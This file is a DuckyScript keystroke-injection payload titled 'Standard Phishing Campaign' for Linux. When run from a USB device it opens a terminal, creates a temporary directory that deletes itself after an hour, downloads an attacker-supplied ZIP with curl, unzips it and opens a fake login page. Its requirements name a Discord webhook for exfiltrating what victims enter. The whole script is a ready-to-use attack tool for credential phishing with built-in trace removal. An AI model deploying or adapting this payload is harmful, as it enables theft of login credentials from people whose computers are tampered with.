* #############################################
* #                                           |
* # Title        : Standard Phishing Campaign |
* # Author       : Aleff                      |
* # Version      : 1.0                        |
* # Category     : Phishing                   |
* # Target       : Linux                      |
* #                                           |
* #############################################

* Requirements:
*     - Internet Connection
*     - You own ZIP link
*     - Discord webhook (or whatever you want to use for the exfiltration)
*     - Python
*     - 'ExecutionPolicy Bypass' if used in Windows 10/11


DELAY 1000
CTRL-ALT t
DELAY 2000


* #### Main SECTION ####

* Create a random directory
STRING dir_name=$(mktemp -d)
ENTER
DELAY 500

* Delete the directory after 60 minutes (3600 seconds)
STRING (sleep 3600 && rm -rf $dir_name) &
ENTER
DELAY 500

* Move into the directory
STRING cd $dir_name
ENTER
DELAY 500

* Download the zip from your own link
* REQUIRED - Replace example.com/file.zip with your own ZIP link. The zip should contian the files ['login.html', 'script.js']
STRING curl -LOk "#ZIP_LINK"
ENTER
DELAY 500

* Unzip it
STRING unzip file.zip
ENTER
DELAY 500

* Open the login page
STRING xdg-open login.html; exit;
ENTER
